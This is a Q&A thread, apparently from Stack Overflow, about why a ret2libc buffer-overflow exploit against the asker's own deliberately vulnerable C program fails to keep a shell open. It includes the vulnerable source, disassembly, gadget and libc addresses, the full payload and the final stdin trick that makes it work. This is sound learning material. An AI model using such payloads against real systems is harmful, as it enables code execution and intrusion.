# ret2libc attack doesn't spawn shell

Tags: c, error-handling, gdb, buffer-overflow, libc

I performed ret2libc.Everything worked fine but the shell is not spawned.The source code is

```
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
void get()
{
  char buf[10];
  scanf("%s",buf);
  printf("%s\n",buf);
}
int main()
{
  get();
  printf("Done\n");
  printf("/bin/sh");
  return 1;
}
```

The disassembly from gdb is

```
(gdb) disass main
Dump of assembler code for function main:
   0x0000555555555184 <+0>:     push   rbp
   0x0000555555555185 <+1>:     mov    rbp,rsp
   0x0000555555555188 <+4>:     mov    eax,0x0
   0x000055555555518d <+9>:     call   0x555555555155 <get>
   0x0000555555555192 <+14>:    lea    rdi,[rip+0xe6e]        # 0x555555556007
   0x0000555555555199 <+21>:    call   0x555555555030 <puts@plt>
   0x000055555555519e <+26>:    lea    rdi,[rip+0xe67]        # 0x55555555600c
   0x00005555555551a5 <+33>:    mov    eax,0x0
   0x00005555555551aa <+38>:    call   0x555555555040 <printf@plt>
   0x00005555555551af <+43>:    mov    eax,0x1                                                                                                                       
   0x00005555555551b4 <+48>:    pop    rbp                                                                                                                           
   0x00005555555551b5 <+49>:    ret                                                                                                                                  
End of assembler dump.                                                                                                                                               
(gdb) disass get                                                                                                                                                     
Dump of assembler code for function get:                                                                                                                             
   0x0000555555555155 <+0>:     push   rbp                                                                                                                           
   0x0000555555555156 <+1>:     mov    rbp,rsp                                                                                                                       
   0x0000555555555159 <+4>:     sub    rsp,0x10                                                                                                                      
   0x000055555555515d <+8>:     lea    rax,[rbp-0xa]                                                                                                                 
   0x0000555555555161 <+12>:    mov    rsi,rax                                                                                                                       
   0x0000555555555164 <+15>:    lea    rdi,[rip+0xe99]        # 0x555555556004                                                                                       
   0x000055555555516b <+22>:    mov    eax,0x0                                                                                                                       
   0x0000555555555170 <+27>:    call   0x555555555050 <__isoc99_scanf@plt>                                                                                           
   0x0000555555555175 <+32>:    lea    rax,[rbp-0xa]                                                                                                                 
   0x0000555555555179 <+36>:    mov    rdi,rax                                                                                                                       
   0x000055555555517c <+39>:    call   0x555555555030 <puts@plt>                                                                                                     
   0x0000555555555181 <+44>:    nop                                                                                                                                  
   0x0000555555555182 <+45>:    leave                                                                                                                                
   0x0000555555555183 <+46>:    ret                                                                                                                                  
End of assembler dump.
```

I used radare2 to find the gadget `pop rdi;ret` and it is located at `0x7ffff7e1d7de`. `/bin/sh` is located at `0x7ffff7f7f1ac`,`system()` is at `0x7ffff7e3f8a0` and `exit()` is at `0x7ffff7e34fe0`

```
(gdb) r < <(python -c 'print("\x41"*10 + "\x42"*8 + "\xde\xd7\xe1\xf7\xff\x7f\x00\x00" + "\xac\xf1\xf7\xf7\xff\x7f\x00\x00" + "\xa0\xf8\xe3\xf7\xff\x7f\x00\x00" + "\xe0\x4f\xe3\xf7\xff\x7f\x00\x00")')
Starting program: /home/kali/Desktop/c_system/a < <(python -c 'print("\x41"*10 + "\x42"*8 + "\xde\xd7\xe1\xf7\xff\x7f\x00\x00" + "\xac\xf1\xf7\xf7\xff\x7f\x00\x00" + "\xa0\xf8\xe3\xf7\xff\x7f\x00\x00" + "\xe0\x4f\xe3\xf7\xff\x7f\x00\x00")')
AAAAAAAAAABBBBBBBB�����
[Detaching after vfork from child process 2664]
[Inferior 1 (process 2658) exited with code 02]
```

When I replaced the address of `/bin/sh`  with the address of `ls` command, it listed the contents of the directory. But `/bin/sh` isn't spawning a shell. I use a 64-bit machine.The program was compiled using `gcc -ggdb -Wall -fno-stack-protector -o a exploit.c` and aslr was disabled manually. Why does it not spawn the shell?

Comment: Hint: where does the shell read input from?

Comment: Here the shell isn't spawned.Then how can it read input?

Comment: How do you know it is not spawned? If it can spawn ls, it should be able to spawn sh, right?

Comment: Take look at my gdb output immediately after detaching vfork, the exit command is executed

Comment: And so is the vfork command, which means the process you were debugging started a new child, I think? What does the debugger say when you try to run ls?

Comment: When ls is used the contents are displayed after detaching vfork and then exit command is executed and yes for sure it started a new child.

Comment: So is it possible that the shell is starting and then exiting? Hint: Where does the shell read input from?

Comment: The shell has not started. The system() command has taken /bin/sh as argument for sure but the shell has not started and the exit() function is executed after system() returns and the system() returns 0

Comment: How do you know the shell has not started? Hint: Where does the shell read input from?

Comment: It does not prompt a shell. And I'm not sure from where does the shell read input.

Comment: Do you know where Linux programs read input from? e.g. if they call `scanf`? Is it from the keyboard?

Comment: Yeah scanf() reads from standard input i.e. Keyboard

Comment: If programs read from the keyboard when they call `scanf`, then why doesn't your program read from the keyboard?

Comment: My problem here is the shell isn't spawned. Only if the shell is spawned, input can be given. Why is the shell now spawned?

Comment: Answer my question first, and you might find out: 
If programs read from the keyboard when they call scanf, then why doesn't your program read from the keyboard when it calls `scanf`?

Comment: I used `r < <(python -c 'print(...)') ` in gdb. This statement is used to pass the result of the python statement as the standard input. So there is no need to input frok keyboard again. I did while running the program in gdb

Comment: Okay so when you call `scanf` it reads from the output of Python. Now, when the *shell* calls `scanf` where do you think it reads from?

Comment: If the shell is called, either the output must be printed or error message must be displayed but neither happens.

Comment: Which output must be printed?

Comment: If it had taken the python statement as input it must be printed or the shell has to wait for input.

Comment: Since you have not figured it out I'll just tell you the answer. I hoped you might spot it by yourself.

Answer (score 1, accepted):

Your program *does* spawn a shell. This is easy to see, because when you change it to spawn `ls`, it spawns `ls`.

Your program's standard input comes from a Python script. Your program reads all the output from the script, then starts a shell. The shell uses the same standard input as your program. The shell tries to read a command, but there is no more input, so it just exits.

Comment: it was the right answer. I thought since system() is called, it would take input from keyboard. By the way thanks.

Comment: can you please provide a solution to spawn a shell and not exit?

Comment: Finally did it. I piped the output of python script into a file and used `(cat file.txt ; cat) | ./executable` and it finally spawned a shell